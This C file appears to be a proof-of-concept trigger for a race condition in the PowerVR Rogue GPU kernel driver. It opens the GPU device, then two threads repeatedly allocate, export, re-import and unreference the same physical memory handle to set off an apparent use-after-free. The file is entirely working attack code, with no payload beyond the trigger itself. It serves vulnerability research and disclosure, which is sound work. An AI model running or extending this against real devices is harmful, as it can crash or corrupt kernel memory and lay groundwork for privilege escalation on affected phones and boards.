#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <unistd.h>
#include <assert.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <inttypes.h>
#include <sys/ioctl.h>

#define __packed __attribute__((packed))

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

// tell the scheduler to pin a task to a specific CPU core
static void pin_task_to(int pid, int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  CPU_SET(cpu, &cset);
  SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
static void pin_to(int cpu) { pin_task_to(0, cpu); }


static int gpu_fd;

#define DRM_IOCTL_PVR_SRVKM_INIT 0x40046445
#define PVR_SRVKM_SERVICES_INIT  1
#define PVR_SRVKM_SYNC_INIT 2
struct drm_pvr_srvkm_init_data {
	uint32_t init_module;
};
static void srvkm_init(void) {
  struct drm_pvr_srvkm_init_data data = { .init_module = PVR_SRVKM_SERVICES_INIT };
  SYSCHK(ioctl(gpu_fd, DRM_IOCTL_PVR_SRVKM_INIT, &data));
}


struct drm_pvr_srvkm_cmd {
  uint32_t bridge_id;
  uint32_t bridge_func_id;
  uint64_t in_data_ptr;
  uint64_t out_data_ptr;
  uint32_t in_data_size;
  uint32_t out_data_size;
};
#define DRM_IOCTL_PVR_SRVKM_CMD  0xc0206440

static int driver_cmd(int bridge_id, int bridge_func_id, void *in_data, void *out_data, int in_size, int out_size) {
  struct drm_pvr_srvkm_cmd cmd = {
    .bridge_id = bridge_id,
    .bridge_func_id = bridge_func_id,
    .in_data_ptr = (unsigned long)in_data,
    .out_data_ptr = (unsigned long)out_data,
    .in_data_size = in_size,
    .out_data_size = out_size
  };
  return ioctl(gpu_fd, DRM_IOCTL_PVR_SRVKM_CMD, &cmd);
}
#define do_driver_cmd_noerror(bridge_id, bridge_func_id) ({                                \
    SYSCHK(driver_cmd((bridge_id), (bridge_func_id), &in, &out, sizeof(in), sizeof(out))); \
})
#define do_driver_cmd(bridge_id, bridge_func_id) ({                                        \
    do_driver_cmd_noerror((bridge_id), (bridge_func_id));                                  \
    if (out.eError != 0) errx(1, #bridge_func_id " eError %u", out.eError);                \
})

typedef char IMG_CHAR;
typedef int IMG_INT;
typedef void *IMG_HANDLE;
typedef int PVRSRV_ERROR;
typedef uint64_t IMG_DEV_VIRTADDR;
typedef uint64_t IMG_DEVMEM_SIZE_T;
typedef uint64_t IMG_DEVMEM_ALIGN_T;
typedef uint8_t IMG_UINT8;
typedef uint32_t IMG_UINT32;
typedef uint64_t IMG_UINT64;
typedef IMG_UINT64 PVRSRV_MEMALLOCFLAGS_T;


#define PVRSRV_BRIDGE_MM 6

#define PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR 10
typedef struct PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
	uint64_t uiChunkSize;
	uint64_t uiSize;
	uint32_t *pui32MappingTable;
	const char *puiAnnotation;
	uint32_t ui32AnnotationLength;
	uint32_t ui32Log2PageSize;
	uint32_t ui32NumPhysChunks;
	uint32_t ui32NumVirtChunks;
	uint32_t ui32PDumpFlags;
	uint32_t ui32PID;
	uint64_t uiFlags;
} __packed PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR;
typedef struct PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
	IMG_HANDLE hPMRPtr;
	int eError;
  PVRSRV_MEMALLOCFLAGS_T uiOutFlags;
} __packed PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR;

#define PVRSRV_BRIDGE_MM_PMRUNREFPMR 7
typedef struct PVRSRV_BRIDGE_IN_PMRUNREFPMR_TAG
{
	IMG_HANDLE hPMR;
} __packed PVRSRV_BRIDGE_IN_PMRUNREFPMR;
typedef struct PVRSRV_BRIDGE_OUT_PMRUNREFPMR_TAG
{
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_PMRUNREFPMR;


#define PVRSRV_BRIDGE_DMABUF 11

#define PVRSRV_BRIDGE_DMABUF_PHYSMEMIMPORTDMABUF 0
typedef struct PVRSRV_BRIDGE_IN_PHYSMEMIMPORTDMABUF_TAG
{
	const IMG_CHAR *puiName;
	IMG_INT ifd;
	IMG_UINT32 ui32NameSize;
	PVRSRV_MEMALLOCFLAGS_T uiFlags;
} __packed PVRSRV_BRIDGE_IN_PHYSMEMIMPORTDMABUF;
typedef struct PVRSRV_BRIDGE_OUT_PHYSMEMIMPORTDMABUF_TAG
{
	IMG_DEVMEM_ALIGN_T uiAlign;
	IMG_DEVMEM_SIZE_T uiSize;
	IMG_HANDLE hPMRPtr;
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_PHYSMEMIMPORTDMABUF;

#define PVRSRV_BRIDGE_DMABUF_PHYSMEMEXPORTDMABUF 2
typedef struct PVRSRV_BRIDGE_IN_PHYSMEMEXPORTDMABUF_TAG
{
	IMG_HANDLE hPMR;
} __packed PVRSRV_BRIDGE_IN_PHYSMEMEXPORTDMABUF;
typedef struct PVRSRV_BRIDGE_OUT_PHYSMEMEXPORTDMABUF_TAG
{
	PVRSRV_ERROR eError;
	IMG_INT iFd;
} __packed PVRSRV_BRIDGE_OUT_PHYSMEMEXPORTDMABUF;


// non-sparse, locked
static IMG_HANDLE alloc_pmr(uint64_t alloc_size) {
  uint32_t mapping_table[1] = { 0 }; // virtual chunk idx by physical chunk idx ?
  uint64_t heap_idx = 1; // cpu-local
  uint64_t cpu_cache_mode = 2; // cache-coherent with snoop if supported
  uint64_t gpu_cache_mode = 2; // cache-coherent with snoop if supported
  PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR in = {
    .uiChunkSize = alloc_size,
    .uiSize = alloc_size,
    .pui32MappingTable = mapping_table,
    .puiAnnotation = "foobar",
    .ui32AnnotationLength = 7,
    .ui32Log2PageSize = 12,
    .ui32NumPhysChunks = 1, // ?
    .ui32NumVirtChunks = 1,
    .ui32PDumpFlags = 0,
    .ui32PID = 0,
    .uiFlags = 0xf/*GPU RW, remap ok*/ | 0xf0/*CPU RW, remap ok*/ | (gpu_cache_mode << 8) | (cpu_cache_mode << 11) |
               (/*kernel-mappable*/0<<14) | (/*on-demand*/0<<15) | (/*SVM*/0<<17) |
               (/*sparse no dummy*/0<<18) | (/*cache clean*/1<<19) |
               (/*zero backing*/0<<20) | (/*zero on alloc*/0ULL<<31) | (heap_idx << 59)
  };
  PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR);
  return out.hPMRPtr;
}

static void unref_pmr(IMG_HANDLE pmr) {
  PVRSRV_BRIDGE_IN_PMRUNREFPMR in = { .hPMR = pmr };
  PVRSRV_BRIDGE_OUT_PMRUNREFPMR out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PMRUNREFPMR);
}

static IMG_HANDLE import_dmabuf(int fd) {
  PVRSRV_BRIDGE_IN_PHYSMEMIMPORTDMABUF in = { .ifd = fd };
  PVRSRV_BRIDGE_OUT_PHYSMEMIMPORTDMABUF out;
  do_driver_cmd(PVRSRV_BRIDGE_DMABUF, PVRSRV_BRIDGE_DMABUF_PHYSMEMIMPORTDMABUF);
  return out.hPMRPtr;
}

static int export_dmabuf(IMG_HANDLE pmr) {
  PVRSRV_BRIDGE_IN_PHYSMEMEXPORTDMABUF in = { .hPMR = pmr };
  PVRSRV_BRIDGE_OUT_PHYSMEMEXPORTDMABUF out;
  do_driver_cmd(PVRSRV_BRIDGE_DMABUF, PVRSRV_BRIDGE_DMABUF_PHYSMEMEXPORTDMABUF);
  return out.iFd;
}

static IMG_HANDLE pmrh2;
static volatile int race_state = 0;

static void *thread_fn(void *arg) {
  while (1) {
    while (race_state == 0) /*spin*/;

    unref_pmr(pmrh2);

    race_state = 0;
  }
}

int main(void) {
  sync();
  setbuf(stdout, NULL);

  gpu_fd = SYSCHK(open("/dev/dri/by-path/platform-pvr-rogue.1.auto-card", O_RDWR));
  srvkm_init();

  pthread_t thread;
  if (pthread_create(&thread, NULL, thread_fn, NULL))
    errx(1, "pthread_create");

  while (1) {
    IMG_HANDLE pmrh1 = alloc_pmr(0x1000);
    pmrh2 = import_dmabuf(export_dmabuf(pmrh1));
    assert(pmrh1 != pmrh2);

    race_state = 1;

    unref_pmr(pmrh1);

    while (race_state == 1) /*spin*/;
  }
}
